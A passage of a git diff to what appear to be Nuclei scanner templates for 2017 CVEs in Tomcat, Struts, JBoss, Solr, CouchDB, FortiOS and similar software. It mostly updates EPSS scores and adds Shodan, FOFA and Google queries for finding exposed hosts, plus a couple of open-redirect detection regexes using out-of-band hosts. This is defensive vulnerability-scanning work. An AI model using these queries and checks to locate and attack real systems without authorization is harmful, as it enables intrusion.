4a0a00473045022006d394921b0d5a7e04a3fd4c15837d306fae435cd168294f0200ce3c8b85c3de022100a28cc857dd6bb3e3b7914deddd731f3d7a9a721dd521879f221cff5c81597e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c631524c65923977cc817706686c9bd084ffad5e51783b2a839b76d4c67091af02202395f868034ad84c6f40b9bb572ebaff7c0f7ca39a3ad3d38a6b5fc9cb057baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 08e502507c..650fe12483 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -13,20 +13,21 @@ info: - https://github.com/intelliants/subrion/issues/479 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q - https://nvd.nist.gov/vuln/detail/CVE-2017-11444 + - https://github.com/d4n-sec/d4n-sec.github.io + - https://github.com/qazbnm456/awesome-cve-poc classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.018 - epss-percentile: 0.86776 + epss-percentile: 0.88111 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelliants product: subrion_cms tags: cve2017,cve,sqli,subrion,intelliants - variables: string: "{{to_lower(rand_base(5))}}" hex_string: "{{hex_encode(string)}}" @@ -46,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2343cc25b19e1ca3bd71b44003198237cb5901c4d7ebc10cf40e0e9b49fd6bf02203ea67091fb55c946949988fcfc0c892ed7166c3f42c21f180e21804e89046e75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 8b2924e2e0..d0bc79ad4e 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -29,7 +29,11 @@ info: max-request: 2 vendor: manageengine product: servicedesk - shodan-query: http.title:"ManageEngine" + shodan-query: + - http.title:"ManageEngine" + - http.title:"manageengine" + fofa-query: title="manageengine" + google-query: intitle:"manageengine" tags: cve,cve2017,manageengine,lfr,unauth,tenable http: @@ -47,4 +51,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb199b44e37551d367047b821f49300f61d49858b1de067bba4dd0f5af55c4dd0221009f84f83d1e43de9ad11f4d6c95d67e88e24e1aa509c79f8188b7fd1806b8de95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index eeb8555f87..0749b81be1 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -20,14 +20,18 @@ info: cvss-score: 8.8 cve-id: CVE-2017-11610 cwe-id: CWE-276 - epss-score: 0.97449 - epss-percentile: 0.99947 + epss-score: 0.9745 + epss-percentile: 0.9995 cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: supervisord product: supervisor - shodan-query: http.title:"Supervisor Status" + shodan-query: + - http.title:"Supervisor Status" + - http.title:"supervisor status" + fofa-query: title="supervisor status" + google-query: intitle:"supervisor status" tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord http: @@ -65,4 +69,4 @@ http: - "" - "" condition: and -# digest: 490a0046304402201ad8588b21856c3e2e3cd9b2005efb3ab532688a03f56bfe6b6d4700adcfeb24022034a9d062ba9d9e21715b31256d921ca212e61f2266208cc6aac596dd63b3d22f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022035f43b6eaf413ec6cf42ec9e01229c052625ec793f772dff4948fa29acc77c55022100c149c66e8b68bb49a2e0e36ad115b66ae41b4b2745133b3fd9f7d83b51a10874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 27471932c3..43bc1eb5f4 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40119 + epss-percentile: 0.41273 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d01d92bbe3a4ba9ea85de6f3a033ae4aa2b93a18bd1629682789b01668ec35140221008619ec2e6de780f1c714003d002cb9e11f38bbb4b01264975b377553dface393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005fcdc60262e01e12069852afe42a0eedafab81d426886973743338e702ccc62022031d42c10658e22416f781bd233b360a6903478e12077bc6a5485d227dcd87242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 98472b843b..fe3ecd31ed 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - epss-percentile: 0.24419 + epss-percentile: 0.26054 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d50b605dc5d7aa83bf305787cb9d0325014343d2d679489b1beb3eb6f3f7ba3d022100d6797bb1079261616de2593b32cc99578347d5cd577e9c0dcf05eab86d23b240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 58f8620d53..edfda1c503 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -21,12 +21,17 @@ info: cve-id: CVE-2017-12149 cwe-id: CWE-502 epss-score: 0.9719 - epss-percentile: 0.99802 + epss-percentile: 0.9982 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: redhat product: jboss_enterprise_application_platform + shodan-query: + - http.title:"jboss" + - cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform" + fofa-query: title="jboss" + google-query: intitle:"jboss" tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat http: @@ -61,4 +66,4 @@ http: status: - 200 - 500 -# digest: 4b0a00483046022100ff07339440ed832558350d4e1909be660a2e00b68ca5777281e9e43e25195d8c022100f8797a6125eb10137f47322fda28c9b9075841e230dd91cacc849802e719af59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093a029dbe058a25a05e53abbb431152e07db1e0304aa1feb9af3f783577e3e62022100de2b630f57bdf4e444177d9fcd3937b26db57bf1f115f7814a0c67a3e7b7cd85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 6cc4cf375b..4c3a6444ab 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - epss-percentile: 0.99637 + epss-percentile: 0.99656 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d6096a44064ff11a98cb2a3b0e4ea152b4e05f54485d6eb402c890697a0d3a7902205eda1523b2432502e783dad4db1ca29da4c467564da34d58541f827c4653f9ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c664906de3dbfed265f2b22def98c3be8115a90a6329d475abc146aed54b40590220232f4a4d20c1a0eabfee1bb1cf5bd6b769acee1a64e4ad2df72e4d026bb578ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 4ee30b5e16..a2b103f3a2 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -18,14 +18,19 @@ info: cvss-score: 6.1 cve-id: CVE-2017-12583 cwe-id: CWE-79 - epss-score: 0.00117 - epss-percentile: 0.44712 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dokuwiki product: dokuwiki - shodan-query: http.title:"DokuWiki" + shodan-query: + - http.title:"DokuWiki" + - http.title:"dokuwiki" + - cpe:"cpe:2.3:a:dokuwiki:dokuwiki" + fofa-query: title="dokuwiki" + google-query: intitle:"dokuwiki" tags: cve,cve2017,xss,dokuwiki http: @@ -48,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021e70441ecec6a86cdfa6a9fda31a1331fd0aa632e49876c27d3e2eb3e43d9da02204238eb89e9b3b18bface8760b2fe302ec833b5b159bfb24e58002276da8c728f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index a62430eeb1..ff5e481f8e 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -27,6 +27,15 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts http: @@ -43,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a7e846889ca9fef021f58b756f7db9e533f0fd2b079699079c49a442f3a817302200cac7efeb08c7927aba913cf747c76517a5bc78708c560f54c0cc97f9bad6598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fbef42748f3123d9a6cd014a5b9f612229aa7839437c25339811bd5150c8a5402203f3195e1a44cb5ae1fc4086756c6b0d41465f01ab9b7634fc017c764a77ca9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 208f3d300a..a75efe6abb 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -21,14 +21,22 @@ info: cvss-score: 8.1 cve-id: CVE-2017-12615 cwe-id: CWE-434 - epss-score: 0.96878 - epss-percentile: 0.99684 + epss-score: 0.96728 + epss-percentile: 0.99659 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive http: @@ -69,4 +77,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220379d0c5f5c4e19ce0caab699ea5aa078fc15bd35974269774e64b108806b79be0220532d269649aaacb9e369acb9a5d57da778c6df5d4a0afa2976c71e42e63a865c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f76ba87ee6950ae8993f54b86cb9d672dad2cad52e4046e468435c556ca24187022100e066b49b38722e0d123561d3d9a2d70dfda587fa91320c78e7bded44327b4eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index ff6836350e..a0dd704330 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -29,7 +29,15 @@ info: max-request: 2 vendor: apache product: tomcat - shodan-query: html:"Apache Tomcat" + shodan-query: + - html:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2017,cve,tomcat,apache,rce,kev,intrusive http: @@ -53,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200df5d0031dfadf13a1849f2d0c1bb5de3762ceef25bad786d5ddfc3668d41fe8022100d143a6b17d505e9d49d36c4d42d0ef08f67cbf0dcfdf8f977a34b7f7f5d4fe23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index ad974d371a..6333cd264d 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -20,13 +20,23 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12629 cwe-id: CWE-611 - epss-score: 0.97417 - epss-percentile: 0.99925 + epss-score: 0.97427 + epss-percentile: 0.99938 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: solr + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve2017,cve,oast,xxe,vulhub,solr,apache http: @@ -51,4 +61,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4b0a00483046022100d4ea117d6f8a9a0bca004f0dd6abfb5a07ccac04c694a225786fb4891966d967022100e00d1081ae2657e9248dc91e946a1ff3d4745375c562b0273a375d31b5fe26c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2c341b990d48ded7ddbd5f4a719db63bcb6e5872f4c375a023f4a8844fc22f502207666e5d47d8024726002d198397d90a82f075facc95ad7a521357eb8f098759f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 651e869029..1b9f35557a 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2017-12635 cwe-id: CWE-269 - epss-score: 0.97348 - epss-percentile: 0.99889 + epss-score: 0.97392 + epss-percentile: 0.99913 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: couchdb + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: cve2017,cve,couchdb,apache,intrusive http: @@ -63,4 +66,4 @@ http: status: - 201 - 409 -# digest: 4a0a0047304502203addb2b6e215dbff5fb9d55765b537597f5a37384aa1a41b3cdc23deecc6650a022100a8103420fbf062ce4677bc443e076baa92d8b4301fda6d2729268d370c359b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050e18ef12c950a98aad45bbff1941e8c7a7fd93167d9f197d425495af6cbc0eb022100cd291eceb0c13ca25c672741579c020568759fb0c2fd96e3cb1ea788aa453432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 38169b306e..e554926005 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -20,14 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2017-12637 cwe-id: CWE-22 - epss-score: 0.00648 - epss-percentile: 0.78875 + epss-score: 0.00715 + epss-percentile: 0.80483 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve2017,cve,sap,lfi,java,traversal http: @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204718a1f0fc5fb3d6d079a6f410f3203c6081f696613bfb4167a3aedfc56fb25f0221008e2ab021c906aea464f0dacae54694f30f2fa359573d32c35a6dda81f4e2204d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed783ef94c829051131156882a1d41055caef81f37348b2ee7a988c2c726c40e022100ee5604c068addc2f9d74d2d87a2c8aebdfeded306b9c27dbd7f8e979ddebcf45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 13ca931fa2..e601acc5ff 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -22,12 +22,13 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59827 + epss-percentile: 0.59849 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve2017,cve,xss,django,djangoproject http: @@ -50,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022045d37d6d95dbcf0d99b3dd98b0548af3f80775282906963e91de53ddd88178e102207fef1b1e81deb1e461760619d1398e0d670d6ad1cb6109983598f16783a68676:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efedfed019372fabd4ec462ca8128065b5c74513db3e9e565a9f74f45b7714c802206c5fe554f4a89a675c078661b0ad020fd9ccad466d1ecd821a5632bbc74749ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 199cc5bec1..11dd0d4441 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -21,13 +21,17 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - epss-percentile: 0.99625 + epss-percentile: 0.99643 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dreambox product: opendreambox - shodan-query: title:"Dreambox WebControl" + shodan-query: + - title:"Dreambox WebControl" + - http.title:"dreambox webcontrol" + fofa-query: title="dreambox webcontrol" + google-query: intitle:"dreambox webcontrol" tags: cve,cve2017,dreambox,rce,oast,edb http: @@ -53,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220698aef45fb765d687383961414979c5887eddf98121aa39048ba6f22392d374802202c71c44bdf2e149840f9cef78912bb4112076d87527c5b8a8744946b59339791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce29e5525407a2f2e753300fa20de455c7e569e604d0d846e4829e9d89c40ed3022072c1d24e0789446dff4fdd51e0751550c2c54a31f63af7e901ef7affc7f77b65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index e70352dcf8..d670acf038 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -22,14 +22,21 @@ info: cve-id: CVE-2017-14186 cwe-id: CWE-79 epss-score: 0.02948 - epss-percentile: 0.89847 + epss-percentile: 0.90833 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fortinet product: fortios - shodan-query: port:10443 http.favicon.hash:945408572 + shodan-query: + - port:10443 http.favicon.hash:945408572 + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - http.html:"/remote/login" "xxxxxxxx" + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2017,cve,fortigate,xss,fortinet http: @@ -52,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207fbfece700e8438f7ceb29e6cb4c1c3db50af2a9118f2a83bd83f1038f9e82d6022100a1093d8d2a97f1f72a728b30504eb3343bb6c5154e62389cc9ab4c4b6c8d3bf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a35ac392c25a48436dfa18c813dbea2d8dca89c123b1d60e5083f49ea75e8e50221009bbe39d97de2e8ca685b62fe32dab6aca9ad9e733ff6fe6ffe5b6306f0d1268b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 20a95213bc..aab178fe4e 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - epss-percentile: 0.6357 + epss-percentile: 0.65482 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d0c495d738c812d3814d912d4d9a15c2068f31549dd5a6094fc26ff7e3fea5f022100bd6cecc315841b445bfd54e0577138bc398e39992b4fd808404389443dc7984c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 3c902736d6..f73440c041 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - epss-percentile: 0.91577 + epss-percentile: 0.92413 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004c2c0b0bfc6a4b5299eb051ed30519d948e89244430b213fad2de42968d5d0602207a33257c46086bb05aa71c1e223813644d52d434ee6d268a0c78b20851101d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220212a0e411a7dfdddc9cefecce4b3e6da4e1d9ab9798165a2e1bdeb040a9f841a022100a563dc32c6b5450a3e77b949621ad22bde185127feaa4fe3221a49c5f800c6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 14d594b33d..be742d8764 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47816 + epss-percentile: 0.48695 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068ae0e1c39c551c92415126fbe3278656ee8caa5459408d8cfb363321b1cfbe302203012f89152ceecc895732bca30da0ba6495ef79ff4f0a96af28e2a8a71e423b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index a3aac17359..aaa705abb8 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.49339 + epss-percentile: 0.50196 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 product: api_manager + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve,cve2017,wso2,xss http: @@ -47,4 +50,4 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022034f84ef006638a070852b350742ad77cd35f09148d0fbf4414429225a72f02e1022100c0814184d527fbae67d23da2ebd61e4645fa2c28e29bff5142f47a551b927bcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a8055a3c4f6a207fcbcbc251ad23ae0ca38a2c9274678e60f4d7f6794372f2b02203f743b45bed131ec4e534021b68216b4b0c4b0f37fd85ee60a3bb6258e21fbd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 9ffbdca378..5ba1da6df7 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -13,18 +13,21 @@ info: - https://twitter.com/nodejs/status/913131152868876288 - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - https://nvd.nist.gov/vuln/detail/CVE-2017-14849 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96684 - epss-percentile: 0.99566 + epss-percentile: 0.99644 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs product: node.js + shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" tags: cve2017,cve,nodejs,lfi http: @@ -42,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210091a03fe8bc062a8f4ab9b7ce6642025c5599951a009a17ed9ef4ffe4e24c7ccd0220570d8f49b671763897be8c2893f0da5b7e725eaa8a75b1d33581fc1327547dff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc70e1874f9cb05ffce4e903656bec52da2f4c00911ce81bf12be3d78825a7740221008cc52739137460a82d8edee7d9310d0397e83e70cc1bd5c4934b0a662204180d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 9004855cb0..74b4a12fce 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46737 + epss-percentile: 0.47671 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: - type: word words: - 'Unknown command: ' -# digest: 